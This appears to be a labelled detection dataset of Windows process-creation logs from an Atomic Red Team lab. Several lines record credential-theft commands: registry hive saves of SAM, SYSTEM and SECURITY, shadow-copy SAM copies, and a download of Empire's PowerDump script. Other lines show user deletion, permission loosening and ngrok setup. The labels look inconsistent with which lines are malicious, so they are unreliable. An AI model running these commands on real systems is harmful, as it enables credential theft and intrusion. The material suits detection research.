text
stringlengths
65
3.78k
label
int64
0
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== whoami.exe "C:\Windows\system32\whoami.exe"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %temp%\T1222.001_cacls ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Python311\Scripts\pip.exe python.exe "C:\Python311\python.exe" "C:\Python311\Scripts\pip.exe" install pypykatz
0
reg.exe unknown C:\Windows\System32\reg.exe save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security cmd.exe C:\Windows\System32\cmd.exe ar-win-2.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "net user $ /DELETE 2>&1" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe WMIADAP.exe C:\Windows\System32\wbem\WMIADAP.exe /F /T /R
0
reg.exe C:\Windows\System32\reg.exe save HKLM\system C:\Users\ADMINI~1\AppData\Local\Temp\system C:\Windows\System32\cmd.exe ar-win-dc.attackrange.local Administrator
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%%programfiles%%/WinRAR/Rar.exe" (exit /b 1)" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "mkdir C:\AtomicRedTeam\atomics\T1560.001\victim-files & cd C:\AtomicRedTeam\atomics\T1560.001\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%%ProgramFiles%%\7-zip\7z.exe" u archive.7z *txt -pblue & dir" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\SppExtComObj.Exe slui.exe "C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=21c56779-b449-4d20-adfc-eece0e1ad74b;Trigger=TimerEvent
0
ar-win-2.attackrange.local Administrator "powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Import-Module \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"" Invoke-PowerDump} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "for /l %%x in (1,1,75) do start wordpad.exe /p C:\AtomicRedTeam\atomics\..\ExternalPayloads\T1059_003note.txt" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
cmd.exe "cmd.exe" /c "icacls "C:\Users\Public\*" /grant Everyone:F /T /C /Q" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\makecab.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBAC1.tmp" "c:\Users\Administrator\AppData\Local\Temp\3d31m1j0\CSC13DE0F26EF8E4FD8A87D96E770665F14.TMP"
0
cmd.exe cmd /c echo Hello, from CMD! cmd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbABlAGEAbgB1AHAA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe taskhostw.exe C:\Windows\System32\taskhostw.exe
0
cmd.exe C:\Windows\System32\cmd.exe /c "mkdir %temp%\T1222.001_takeown_folder & echo T1222.001_takeown1 >> %temp%\T1222.001_takeown_folder\T1222.001_takeown1.txt & echo T1222.001_takeown2 >> %temp%\T1222.001_takeown_folder\T1222.001_takeown2.txt" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== chcp.com "C:\Windows\system32\chcp.com" 65001
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\CompatTelRunner.exe conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\svchost.exe UsoClient.exe "C:\Windows\system32\usoclient.exe" RefreshSettings
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\zf5msde5.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES8EBF.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC990F7FEBC7414CA9A3433024496A9E7B.TMP"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe chcp.com "C:\Windows\system32\chcp.com" 65001
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
0
cmd.exe C:\Windows\System32\cmd.exe /c "at 13:20 /interactive cmd" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "net.exe stop spooler" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c c:\windows\system32\calc.exe cmd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES26CE.tmp" "c:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-133400279192352871-275900552\CSC5C543E8BC582458FAEA27E59FB836A5C.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe ngen.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" ExecuteQueuedItems /LegacyServiceBehavior
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe "cmd.exe" /c "at 13:20 /interactive cmd" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\"") {exit 0} else {exit 1}} csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ek1sxfsl\ek1sxfsl.cmdline"
0
reg.exe reg.exe reg save HKLM\system C:\Users\ADMINI~1\AppData\Local\Temp\system cmd.exe "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-2.attackrange.local Administrator
1
reg.exe reg save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-dc.attackrange.local Administrator
1
cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 splunkd.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "cmd /r cmd<C:\AtomicRedTeam\atomics\T1059.003\src\t1059.003_cmd.cmd" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" & {Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""C:\AtomicRedTeam\atomics\..\ExternalPayloads\PowerDump.ps1\""} HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
reg.exe reg.exe reg save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security cmd.exe "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-2.attackrange.local Administrator
1
cmd.exe unknown C:\Windows\System32\cmd.exe /c "mkdir C:\AtomicRedTeam\atomics\T1560.001\victim-files & cd C:\AtomicRedTeam\atomics\T1560.001\victim-files & echo "This file will be encrypted" > .\encrypted_file.txt & "%ProgramFiles%\7-zip\7z.exe" u archive.7z *txt -pblue & dir" powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd.exe C:\Windows\System32\cmd.exe /c "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%programfiles%/WinRAR/Rar.exe" (exit /b 1)" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "cmd.exe" /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a" certutil.exe certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss5 2
0
cmd.exe "C:\Windows\system32\cmd.exe" /d /c C:\Windows\system32\silcollector.cmd configure svchost.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe "C:\Windows\system32\cmd.exe" /c "if not exist "%%ProgramFiles%%\7-zip\7z.exe" (exit /b 1)" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\services.exe msdtc.exe C:\Windows\System32\msdtc.exe
0
cmd.exe C:\Windows\System32\cmd.exe /c "reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\s1oh1tyf\s1oh1tyf.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBB4E.tmp" "c:\Users\Administrator\AppData\Local\Temp\s1oh1tyf\CSC52BB1242C3B479098FFC7D2D6250ED.TMP"
0
ar-win-2.attackrange.local AR-WIN-2$ C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"
0
ar-win-2.attackrange.local Administrator "cmd.exe" /c "for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) && dir /B %temp%\SAMvss%a" certutil.exe certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM" C:\Users\ADMINI~1\AppData\Local\Temp\SAMvss2 2
0
ngrok.exe unknown "C:\Users\Public\ngrok\ngrok.exe" config add-authtoken N/A powershell.exe ar-win-dc.attackrange.local Administrator
1
net.exe net.exe net.exe stop spooler cmd.exe "cmd.exe" /c "net.exe stop spooler" ar-win-dc.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-133400279192352871-275900552\enkzkman.cmdline"
0
net1.exe net1.exe C:\Windows\system32\net1 stop spooler net.exe net.exe stop spooler ar-win-2.attackrange.local Administrator
1
ar-win-2.attackrange.local Administrator "powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA cmd.exe "C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %%errorlevel%%"
0
ar-win-2.attackrange.local Administrator "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\byyqvq2r\byyqvq2r.cmdline" cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBC57.tmp" "c:\Users\Administrator\AppData\Local\Temp\byyqvq2r\CSC35A26D4DB86D49788A25632DCAD13FEF.TMP"
0
cmd.exe C:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 splunkd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== powershell.exe "powershell.exe" -noninteractive -encodedcommand 